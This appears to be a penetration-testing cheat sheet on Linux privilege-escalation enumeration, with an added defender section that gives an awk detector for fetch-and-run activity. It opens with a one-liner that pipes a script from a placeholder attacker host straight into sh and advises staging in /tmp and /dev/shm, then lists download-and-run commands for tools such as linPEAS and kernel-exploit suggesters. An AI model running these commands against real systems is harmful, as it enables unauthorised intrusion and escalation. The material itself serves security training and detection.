
Execution of Scripts

The following one-liner downloads a script, pipes it straight to sh without saving it to disk, and stores the output with tee:

wget http://<Attacker_IP>/<script_name> -O- | sh | tee output.txt

Use writable directories like:

/tmp
/dev/shm
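
Seen from the defender's side, the download-and-run pattern above leaves recognisable traces in process-execution telemetry. The following is an added example, not part of the original page: it flags a downloader piped into a shell, and files made executable or started from /tmp or /dev/shm. The tab-separated record format (user, working directory, command line), the sample records, the address 203.0.113.10 and the names enum.sh and build.sh are assumptions constructed for illustration.

```sh
#!/bin/sh
# Added example (not from the original page): flag fetch-and-run activity in
# process-execution records. Assumed input, one record per line, tab-separated:
#   user <TAB> working directory <TAB> command line

# scan_exec_log: read records on stdin, print "tag<TAB>user<TAB>command" per hit.
scan_exec_log() {
    awk -F '\t' '
    {
        user = $1; cwd = $2; cmd = $3
        in_staging = (cwd ~ /^(\/tmp|\/dev\/shm)(\/|$)/)

        # Downloader output piped straight into a shell interpreter.
        # "sh" must end the word, so "| sha256sum" is not a hit.
        if (cmd ~ /(wget|curl)[^|]*\|[ \t]*(ba|da)?sh([ \t|]|$)/)
            print "pipe-to-shell\t" user "\t" cmd

        # Program started from /tmp or /dev/shm, by absolute path or as
        # ./name while the working directory is inside one of them.
        if (cmd ~ /^(\/tmp|\/dev\/shm)\// || (in_staging && cmd ~ /^\.\//))
            print "exec-from-writable-dir\t" user "\t" cmd

        # File marked executable inside one of those directories.
        if (in_staging && cmd ~ /^chmod[ \t]+[ugoa]*\+x[ \t]/)
            print "chmod-x-in-writable-dir\t" user "\t" cmd
    }'
}

# Constructed sample records; 203.0.113.10 is a documentation address and
# enum.sh / build.sh are made-up names.
sample_records() {
    printf 'www-data\t/var/www/html\twget http://203.0.113.10/enum.sh -O- | sh | tee output.txt\n'
    printf 'www-data\t/dev/shm\tchmod +x linpeas.sh\n'
    printf 'www-data\t/dev/shm\t./linpeas.sh | tee linpeas_output.txt\n'
    printf 'alice\t/home/alice\t/tmp/pspy64\n'
    printf 'alice\t/home/alice\tcurl -fsSL https://example.org/tool.tgz | sha256sum\n'
    printf 'alice\t/home/alice/project\t./build.sh | tee build.log\n'
}

sample_records | scan_exec_log
```

Legitimate installers that use a curl-to-sh pipeline will also match the first rule, so pair it with an allowlist of expected hosts or users.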

linPEAS

Comprehensive and frequently updated Linux privilege escalation auditing script.

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas_output.txt

bangenum.sh

Lightweight initial Linux enumeration script.

wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/\r$//' bangenum.sh   # strip Windows (CRLF) line endings
chmod +x bangenum.sh
./bangenum.sh

pspy

View running processes, cron jobs, and other background tasks without root.

wget https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64
chmod +x pspy64
./pspy64

linux-smart-enumeration

Smart and adaptive Linux enumeration script.

wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
chmod +x lse.sh
./lse.sh -l1

SUID3NUM

SUID binary enumeration script.

wget https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py
python3 suid3num.py

xploit_installer.py

Exploit suggester with Exploit-DB integration.

wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py
python3 xploit_installer.py <exploit_id>

unix-privesc-check (upc.sh)

Classic script for Unix privilege escalation checks.

wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh
chmod +x upc.sh
./upc.sh

linux-local-enum.sh

Simple local Linux privilege escalation enumeration script.

wget https://raw.githubusercontent.com/Arr0way/linux-local-enumeration-script/master/linux-local-enum.sh
chmod +x linux-local-enum.sh
./linux-local-enum.sh

linuxprivchecker.py

Python-based Linux privilege checker.

wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
python3 linuxprivchecker.py

linux-exploit-suggester.sh

Suggests Linux kernel exploits based on system version.

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

KernelPop

Kernel exploit enumeration and suggestion tool.

git clone https://github.com/spencerdodd/kernelpop.git
cd kernelpop
python3 kernelpop.py --os linux --priv

Remember

  • Use non-invasive scanning before attempting any exploits.
  • Avoid anything that “automatically runs exploits” in real or exam environments.